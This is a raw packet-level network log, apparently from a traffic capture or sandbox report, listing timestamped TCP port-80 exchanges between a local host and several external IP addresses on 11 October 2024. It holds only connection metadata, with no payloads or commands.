Oct 11, 2024 10:04:34.314575911 CEST	49879	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:04:34.318437099 CEST	80	49879	3.33.130.190	192.168.11.20
Oct 11, 2024 10:04:34.318603992 CEST	49879	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:04:34.413697958 CEST	80	49879	3.33.130.190	192.168.11.20
Oct 11, 2024 10:04:39.324381113 CEST	49880	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:39.423971891 CEST	80	49880	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:39.424190998 CEST	49880	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:39.432358027 CEST	49880	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:39.531716108 CEST	80	49880	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:39.533648968 CEST	80	49880	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:39.533866882 CEST	49880	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:40.946820021 CEST	49880	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:41.046051025 CEST	80	49880	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:41.964268923 CEST	49881	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:42.063478947 CEST	80	49881	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:42.063721895 CEST	49881	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:42.071374893 CEST	49881	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:42.170546055 CEST	80	49881	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:42.172281027 CEST	80	49881	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:42.172570944 CEST	49881	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:43.586879015 CEST	49881	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:43.688129902 CEST	80	49881	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:44.604293108 CEST	49882	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:44.705918074 CEST	80	49882	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:44.706089020 CEST	49882	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:44.713896990 CEST	49882	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:44.713920116 CEST	49882	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:44.713996887 CEST	49882	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:44.814228058 CEST	80	49882	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:44.814239025 CEST	80	49882	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:44.814246893 CEST	80	49882	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:44.814255953 CEST	80	49882	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:44.814263105 CEST	80	49882	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:44.814270973 CEST	80	49882	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:44.814279079 CEST	80	49882	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:44.822197914 CEST	80	49882	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:44.822432995 CEST	49882	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:46.226924896 CEST	49882	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:46.326785088 CEST	80	49882	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:47.244386911 CEST	49883	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:47.347836018 CEST	80	49883	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:47.348048925 CEST	49883	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:47.353178978 CEST	49883	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:47.454900026 CEST	80	49883	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:47.454982042 CEST	80	49883	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:47.454993010 CEST	80	49883	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:47.455367088 CEST	49883	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:47.457185030 CEST	49883	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:47.463706017 CEST	80	49883	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:47.463823080 CEST	49883	80	192.168.11.20	75.2.103.23
Oct 11, 2024 10:04:47.556839943 CEST	80	49883	75.2.103.23	192.168.11.20
Oct 11, 2024 10:04:52.462038994 CEST	49884	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:52.639034986 CEST	80	49884	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:52.639172077 CEST	49884	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:52.646816969 CEST	49884	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:52.823579073 CEST	80	49884	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:52.823966980 CEST	80	49884	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:52.823978901 CEST	80	49884	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:52.823988914 CEST	80	49884	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:52.824165106 CEST	49884	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:54.162754059 CEST	49884	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:55.180078030 CEST	49885	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:55.353569031 CEST	80	49885	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:55.353750944 CEST	49885	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:55.361366034 CEST	49885	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:55.533667088 CEST	80	49885	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:55.534128904 CEST	80	49885	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:55.534138918 CEST	80	49885	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:55.534151077 CEST	80	49885	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:55.534451008 CEST	49885	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:56.865283012 CEST	49885	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:57.882666111 CEST	49886	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:58.057794094 CEST	80	49886	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:58.057976007 CEST	49886	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:58.065799952 CEST	49886	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:58.065829992 CEST	49886	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:58.065886021 CEST	49886	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:58.065996885 CEST	49886	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:58.241080999 CEST	80	49886	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:58.241486073 CEST	80	49886	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:58.241687059 CEST	80	49886	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:58.241729021 CEST	80	49886	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:58.241766930 CEST	80	49886	161.97.168.245	192.168.11.20
Oct 11, 2024 10:04:58.241985083 CEST	49886	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:04:59.567763090 CEST	49886	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:05:00.585376024 CEST	49887	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:05:00.757895947 CEST	80	49887	161.97.168.245	192.168.11.20
Oct 11, 2024 10:05:00.758105040 CEST	49887	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:05:00.763211966 CEST	49887	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:05:00.935595036 CEST	80	49887	161.97.168.245	192.168.11.20
Oct 11, 2024 10:05:00.935703039 CEST	80	49887	161.97.168.245	192.168.11.20
Oct 11, 2024 10:05:00.935801983 CEST	80	49887	161.97.168.245	192.168.11.20
Oct 11, 2024 10:05:00.935853004 CEST	80	49887	161.97.168.245	192.168.11.20
Oct 11, 2024 10:05:00.936208963 CEST	49887	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:05:00.939174891 CEST	49887	80	192.168.11.20	161.97.168.245
Oct 11, 2024 10:05:01.111135006 CEST	80	49887	161.97.168.245	192.168.11.20
Oct 11, 2024 10:05:05.943428993 CEST	49888	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:06.134450912 CEST	80	49888	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:06.134601116 CEST	49888	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:06.142280102 CEST	49888	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:06.333277941 CEST	80	49888	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:06.333465099 CEST	80	49888	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:06.333477974 CEST	80	49888	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:06.333621979 CEST	49888	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:07.644123077 CEST	49888	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:08.661546946 CEST	49889	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:08.868618011 CEST	80	49889	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:08.868837118 CEST	49889	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:08.876280069 CEST	49889	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:09.083419085 CEST	80	49889	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:09.083440065 CEST	80	49889	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:09.083650112 CEST	80	49889	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:09.083767891 CEST	49889	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:10.377849102 CEST	49889	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:11.395298958 CEST	49890	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:11.586307049 CEST	80	49890	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:11.586539984 CEST	49890	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:11.594331026 CEST	49890	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:11.594353914 CEST	49890	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:11.594428062 CEST	49890	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:11.785430908 CEST	80	49890	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:11.785449982 CEST	80	49890	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:11.785522938 CEST	80	49890	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:11.785655022 CEST	80	49890	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:11.785779953 CEST	80	49890	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:11.785795927 CEST	80	49890	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:11.785811901 CEST	80	49890	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:11.785984039 CEST	80	49890	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:14.113903999 CEST	49891	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:14.323101044 CEST	80	49891	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:14.323287964 CEST	49891	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:14.328387022 CEST	49891	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:14.537344933 CEST	80	49891	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:14.537560940 CEST	80	49891	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:14.537574053 CEST	80	49891	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:14.537873030 CEST	49891	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:14.539705992 CEST	49891	80	192.168.11.20	65.21.196.90
Oct 11, 2024 10:05:14.748706102 CEST	80	49891	65.21.196.90	192.168.11.20
Oct 11, 2024 10:05:19.550328970 CEST	49892	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:19.716438055 CEST	80	49892	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:19.716650009 CEST	49892	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:19.725208044 CEST	49892	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:19.881961107 CEST	80	49892	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:19.888428926 CEST	80	49892	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:19.888569117 CEST	49892	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:19.932537079 CEST	80	49892	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:20.053699970 CEST	80	49892	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:22.252206087 CEST	49893	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:22.428385973 CEST	80	49893	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:22.428625107 CEST	49893	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:22.436248064 CEST	49893	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:22.605146885 CEST	80	49893	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:22.612106085 CEST	80	49893	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:22.612226963 CEST	49893	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:22.655479908 CEST	80	49893	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:22.788309097 CEST	80	49893	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:24.954823971 CEST	49894	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:25.117927074 CEST	80	49894	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:25.118088007 CEST	49894	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:25.125874996 CEST	49894	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:25.281320095 CEST	80	49894	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:25.288858891 CEST	80	49894	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:25.289159060 CEST	49894	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:25.331902027 CEST	80	49894	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:25.451802015 CEST	80	49894	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:27.657330036 CEST	49895	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:27.833281994 CEST	80	49895	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:27.833477974 CEST	49895	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:27.838587046 CEST	49895	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:28.009913921 CEST	80	49895	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:28.014560938 CEST	80	49895	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:28.014784098 CEST	49895	80	192.168.11.20	172.247.44.157
Oct 11, 2024 10:05:28.060117960 CEST	80	49895	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:28.190511942 CEST	80	49895	172.247.44.157	192.168.11.20
Oct 11, 2024 10:05:33.078021049 CEST	49896	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:33.249281883 CEST	80	49896	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:33.249530077 CEST	49896	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:33.257131100 CEST	49896	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:33.428251982 CEST	80	49896	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:33.432264090 CEST	80	49896	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:33.432372093 CEST	80	49896	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:33.432586908 CEST	49896	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:34.763171911 CEST	49896	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:35.780533075 CEST	49897	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:35.951471090 CEST	80	49897	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:35.951628923 CEST	49897	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:35.967706919 CEST	49897	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:36.138861895 CEST	80	49897	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:36.142620087 CEST	80	49897	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:36.142730951 CEST	80	49897	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:36.142900944 CEST	49897	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:37.481246948 CEST	49897	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:38.498734951 CEST	49898	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:38.669548035 CEST	80	49898	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:38.669750929 CEST	49898	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:38.677903891 CEST	49898	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:38.677972078 CEST	49898	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:38.849188089 CEST	80	49898	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:38.849205017 CEST	80	49898	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:38.849222898 CEST	80	49898	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:38.849237919 CEST	80	49898	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:38.849251986 CEST	80	49898	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:38.849268913 CEST	80	49898	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:38.854429960 CEST	80	49898	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:38.854527950 CEST	80	49898	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:38.854707003 CEST	49898	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:40.183861971 CEST	49898	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:41.201234102 CEST	49899	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:41.372425079 CEST	80	49899	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:41.372589111 CEST	49899	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:41.377703905 CEST	49899	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:41.548661947 CEST	80	49899	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:41.552983046 CEST	80	49899	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:41.553080082 CEST	80	49899	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:41.553277969 CEST	49899	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:41.555140018 CEST	49899	80	192.168.11.20	91.212.26.5
Oct 11, 2024 10:05:41.726035118 CEST	80	49899	91.212.26.5	192.168.11.20
Oct 11, 2024 10:05:46.559540033 CEST	49900	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:46.658869982 CEST	80	49900	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:46.659065962 CEST	49900	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:46.666698933 CEST	49900	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:46.765927076 CEST	80	49900	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:48.182063103 CEST	49900	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:48.322305918 CEST	80	49900	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:49.199444056 CEST	49901	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:49.298885107 CEST	80	49901	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:49.299036026 CEST	49901	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:49.306685925 CEST	49901	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:49.406003952 CEST	80	49901	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:49.409476042 CEST	80	49901	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:49.409637928 CEST	49901	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:50.822073936 CEST	49901	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:50.921489000 CEST	80	49901	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:51.839850903 CEST	49902	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:51.939445019 CEST	80	49902	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:51.939631939 CEST	49902	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:51.948482990 CEST	49902	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:51.948553085 CEST	49902	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:52.048048019 CEST	80	49902	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:52.048166990 CEST	80	49902	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:52.048316956 CEST	80	49902	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:52.048329115 CEST	80	49902	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:52.048597097 CEST	80	49902	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:52.048615932 CEST	80	49902	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:52.049115896 CEST	80	49902	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:52.943150997 CEST	80	49902	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:52.943285942 CEST	49902	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:53.462127924 CEST	49902	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:53.561589003 CEST	80	49902	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:54.479590893 CEST	49903	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:54.579397917 CEST	80	49903	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:54.579737902 CEST	49903	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:54.584857941 CEST	49903	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:54.684818029 CEST	80	49903	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:54.695588112 CEST	80	49903	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:54.695600033 CEST	80	49903	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:54.695887089 CEST	49903	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:54.697717905 CEST	49903	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:54.700176954 CEST	80	49903	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:54.700356960 CEST	49903	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:05:54.797605991 CEST	80	49903	3.33.130.190	192.168.11.20
Oct 11, 2024 10:05:59.712780952 CEST	49904	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:00.008063078 CEST	80	49904	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:00.008285046 CEST	49904	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:00.016216993 CEST	49904	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:00.311129093 CEST	80	49904	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:00.311326981 CEST	80	49904	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:00.311613083 CEST	49904	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:01.522872925 CEST	49904	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:02.060064077 CEST	80	49900	3.33.130.190	192.168.11.20
Oct 11, 2024 10:06:02.060262918 CEST	49900	80	192.168.11.20	3.33.130.190
Oct 11, 2024 10:06:02.542495012 CEST	49905	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:02.837310076 CEST	80	49905	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:02.837502003 CEST	49905	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:02.845151901 CEST	49905	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:03.140063047 CEST	80	49905	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:03.140125990 CEST	80	49905	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:03.140269995 CEST	49905	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:04.350377083 CEST	49905	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:05.367819071 CEST	49906	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:05.662580013 CEST	80	49906	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:05.662779093 CEST	49906	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:05.671566010 CEST	49906	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:05.671634912 CEST	49906	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:05.966665030 CEST	80	49906	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:05.966676950 CEST	80	49906	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:05.967001915 CEST	80	49906	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:05.967130899 CEST	80	49906	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:05.967258930 CEST	80	49906	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:05.967461109 CEST	49906	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:07.177896023 CEST	49906	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:08.195271969 CEST	49907	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:08.490088940 CEST	80	49907	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:08.490309954 CEST	49907	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:08.495449066 CEST	49907	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:08.790222883 CEST	80	49907	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:08.790644884 CEST	80	49907	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:08.790913105 CEST	49907	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:08.792728901 CEST	49907	80	192.168.11.20	154.23.184.194
Oct 11, 2024 10:06:09.087476015 CEST	80	49907	154.23.184.194	192.168.11.20
Oct 11, 2024 10:06:13.803947926 CEST	49908	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:13.964935064 CEST	80	49908	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:13.965177059 CEST	49908	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:13.972804070 CEST	49908	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:14.133538961 CEST	80	49908	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:14.160674095 CEST	80	49908	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:14.160784960 CEST	80	49908	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:14.160799980 CEST	80	49908	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:14.160898924 CEST	80	49908	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:14.161005974 CEST	80	49908	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:14.161092043 CEST	49908	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:14.161231995 CEST	49908	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:15.488514900 CEST	49908	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:16.505923986 CEST	49909	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:16.666614056 CEST	80	49909	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:16.666837931 CEST	49909	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:16.674484015 CEST	49909	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:16.834758043 CEST	80	49909	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:16.851497889 CEST	80	49909	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:16.851618052 CEST	80	49909	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:16.851633072 CEST	80	49909	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:16.851644039 CEST	80	49909	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:16.851667881 CEST	80	49909	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:16.851835012 CEST	49909	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:18.175474882 CEST	49909	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:19.192866087 CEST	49910	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:19.353444099 CEST	80	49910	63.250.47.57	192.168.11.20
Oct 11, 2024 10:06:19.353681087 CEST	49910	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:19.361612082 CEST	49910	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:19.361659050 CEST	49910	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:19.361713886 CEST	49910	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:19.361879110 CEST	49910	80	192.168.11.20	63.250.47.57
Oct 11, 2024 10:06:19.522305965 CEST	80	49910	63.250.47.57	192.168.11.20
